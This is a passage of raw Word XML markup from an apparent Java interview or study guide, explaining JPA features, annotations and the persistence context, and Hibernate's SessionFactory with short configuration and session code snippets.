          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Student-Course</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationships, </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Author-Book</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationships, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F5BD1A" w14:textId="6D55B704"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450" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FB47F4" w14:textId="3EFAE796" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00264467">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="568" w:name="_Toc197867782"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is JPA</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="568"/>
    </w:p>
    <w:p w14:paraId="3200AEC2" w14:textId="3A89F640" w:rsidR="007B3D64" w:rsidRPr="007F3379" w:rsidRDefault="007B3D6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Java Persistence API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3D2144"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Java Persistence API) is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java specification</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides a set of rules for managing </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>relational data</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java applications. It allows Java developers to interact with relational databases using </w:t>
      </w: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t>, which simplifies database operations by mapping Java objects to database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473210E8"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71A93">
          <v:rect id="_x0000_i2451" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF8100"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Features of JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC4CC58"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br/>
        <w:t>JPA allows you to map Java objects (entities) to database tables. It abstracts the complexity of SQL and enables developers to interact with the database using Java objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E022AA"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UD Operations:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JPA provides standard methods for </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Creat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Rea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Updat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Delete</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CRUD) operations on persistent entities without writing explicit SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E8D4D"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nagement:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>JPA defines how entities (Java classes) are managed and how they are persisted in a database. It uses annotations like @Entity, @Id, @Table, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499FAFFE"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br/>
        <w:t>JPA defines its own query language called JPQL, which is similar to SQL but operates on entities rather than database tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2F8821"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br/>
        <w:t>JPA offers a type-safe way to build dynamic queries through its Criteria API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50862032"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ifecycle Management:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">JPA manages the lifecycle of entities through states like </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New</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Removed</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DFF92"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033006">
          <v:rect id="_x0000_i2452" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="169262F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Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EBC99F"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ome common annotations used in JPA are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2801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w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Marks a class as an entity that is mapped to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1926C8"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d</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the primary key of the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F1AF7A"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GeneratedValue</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the strategy for automatically generating primary key values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5E004"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able</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines the name of the table to which the entity is mapped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCFEDAC"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umn</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the mapping of a field to a database column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD887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One, @OneToMany, @ManyToMany, @OneToOne</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to define relationships between entities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC94B24"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63FFA">
          <v:rect id="_x0000_i2453" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2454A555"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JPA Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E576E17"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ies:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Java classes annotated with @Entity are considered entities in JPA. These classes are mapped to tables in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B275BBE"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br/>
        <w:t xml:space="preserve">The </w:t>
      </w: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xml:space="preserve"> is the core interface used for interacting with the persistence context (database). It provides methods to manage entities, including saving, deleting, and querying.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF77DBD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249F7CDA"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15856BB9"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ersist(entity);  // Save the entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A825859"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sistence Context:</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">The persistence context is the environment in which entities are managed. Entities are either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persisted in the context) or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removed from the context).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35841464"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br/>
        <w:t>JPA handles transactions to ensure that database operations are performed atomically. Operations are committed or rolled back as part of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270F13CD"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145F1">
          <v:rect id="_x0000_i2454" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877604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vs. Hibernate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B5AEED"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JPA</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specification</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that provides the structure for ORM, while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framework</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that implements this specification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6304B534"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provides additional features beyond JPA, like caching, but JPA defines the core interface and operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A87670"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450C96">
          <v:rect id="_x0000_i2455" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D48BC4"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4002B951"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is a </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java standard</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that defines how Java objects map to relational database tables, providing a powerful framework for managing persistence with automatic CRUD operations. It simplifies database interaction through </w:t>
      </w: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JPA is commonly used with frameworks like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as its implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C529AA1" w14:textId="12D2297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456" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C7F91" w14:textId="292DEA68" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA1AB4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="_Toc197867783"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Session factory in hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:p w14:paraId="0CE32746" w14:textId="361D6687" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC"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Factory in Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016667E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a core interface in Hibernate that provides the functionality to creat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It is responsible for configuring Hibernate, managing the connection to the database, and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that allow you to interact with the persistence context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AC9043"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3BF9C">
          <v:rect id="_x0000_i2457" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07272C8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of SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4730B"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actory for Sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1E165B"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responsible for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which are used to interact with the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4C8516"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 is a single-threaded unit of work. It is used to perform CRUD operations, query the database, and manage the persistence context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9A89A2"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p>
    <w:p w14:paraId="099F1A98"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typically configured using the </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hibernate.cfg.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file or programmatically through </w:t>
      </w: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xml:space="preserve"> class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBEDB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holds Hibernate's configuration settings, such as database connection settings, dialect, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C7887"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hread-Safe Singleton:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D58991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typically instantiated once during application startup and used throughout the lifecycle of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF64DE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is designed to be thread-safe and should be shared by multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3617F12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should be created once per application and closed when the application terminates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C767C"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p w14:paraId="5AAA47C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SessionFactory holds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level cache) and can be configured to work with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for more efficient data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5190FAEE"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AA959">
          <v:rect id="_x0000_i2458" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7618A"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reating and Using SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A65C63F"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and Building SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7333E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 Hibernate configuration file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C11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 configuration = new Configuration();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0958EFEA"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configure("hibernate.cfg.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F89A42" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63429CEF"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essionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8B5731"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sessionFactory = configuration.buildSessionFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359CA8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ing a Session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9FF9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Open a new session from SessionFactory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEEE5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079A591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ing Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4757DCE2"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ransaction = session.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C19FAC" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F174D97"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Perform operations (e.g., save an entity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C089E54"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myEntity);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AEDBC0" w14:textId="77777777" w:rsidR="00E90CAC" w:rsidRPr="007F3379" w:rsidRDefault="00E90CAC" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C31297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ommit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511B15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ransaction.commit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CC7BDE"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ing the SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B8CEC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fter the application completes its operations, you should close the SessionFactory to release resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0E3E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close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B933529"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6FA7D3">
          <v:rect id="_x0000_i2459" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B3A7D"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Why Use SessionFactory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AFAA0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p w14:paraId="5B1A6F23"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is an expensive object to create, so it's designed to be created once and used across the application to avoid unnecessary object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20266C1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p w14:paraId="7D0D1759"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manages the connection to the database and uses </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>connection pooling</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to improve performance by reusing database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45BA99"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upport:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601476CB"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supports </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>second-level caching</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for reusing objects in the persistence context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E234A"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p>
    <w:p w14:paraId="7B3C83AE"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plays an essential role in Hibernate's </w:t>
      </w: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 making sure that all operations are performed within a transactional context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B949415"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64A73">
          <v:rect id="_x0000_i2460" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E01DCC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880388D"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a central component in Hibernate that manages the creation of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and controls configuration, caching, and transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A066D23"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is designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and should be instantiated once for the application, ideally at the startup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7395B17A"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serves as the bridge between your Java application and the database, facilitating the management of persistent objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C99E739" w14:textId="791F481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461" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29239D0D" w14:textId="2669248C" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="00AA3417">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="570" w:name="_Toc197867784"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
